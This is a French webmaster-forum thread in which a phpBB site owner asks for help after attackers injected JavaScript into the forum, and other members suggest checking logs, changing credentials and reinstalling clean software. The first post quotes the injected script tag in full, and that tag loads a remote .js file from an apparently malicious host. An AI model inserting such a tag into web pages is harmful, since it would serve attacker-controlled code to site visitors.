Je me suis fait hacke sous phpbb

Nouveau WRInaute
Bonjour, je me suis fait hacke mon forum avec de l'insertion javascript sur mes pages du forum.
J'ai commencé à faire le ménage du code ci-desous que l'on m'a inséré, mais le problème c'est que je ne comprends pas comme ils ont fait donc si je supprime le code et que 3 jours plus tard sa recommence c'est pas la peine.

Voici le code que l'on m'a inséré sur le forum

<script type="text/javascript" src="http://solk.seamscreative.info:8080/External_Hard_Drive.js"></script>

Au niveau référencement du forum c'est pas génial car google le classe dans les sites du virus etc.
Si quelqu'un pourrait m'aider ou m'expliquer le faille pour que je puisse la corriger merci à lui.
 
WRInaute accro
La première chose à regarder c'est du coté de tes fichiers log.

Comment est ton register_global ?

A plus.
 
Nouveau WRInaute
Bonjour

Analyse ton disque dur avec ton anti-virus/anti-malwares, change tes identifiants FTP et de connexion au forum (compte admin), mets à jour ton forum, vérifie les scripts que tu utilises puis connecte toi aux outils Google Webmaster cela t'en dira davantage après ça, ça devrait aller mieux.

Ton site a été piraté de façon robotisé, certainement par un malware qui a exploité une faille connue et non corrigée
 
Nouveau WRInaute
polweb a dit:
La première chose à regarder c'est du coté de tes fichiers log.

Comment est ton register_global ?

A plus.

Je vais regarder ce soir pour le register_global car je n'ai pas acces pour le moment
mais pour les logs sa va être un peu dur car sa date du 7 juin
 
WRInaute passionné
Supprime/modifie ton lien aussi si tu peux ;)
Si ça date du 7 juin et que tu ne t'en aperçois que maintenant c'est dangereux ;)

Le nettoyage des fichiers PHP risque d'être plus long qu'un écrasage d'une version propre et à jour de PHP BB, puis du nettoyage de ton template uniquement.
 
Discussions similaires
Haut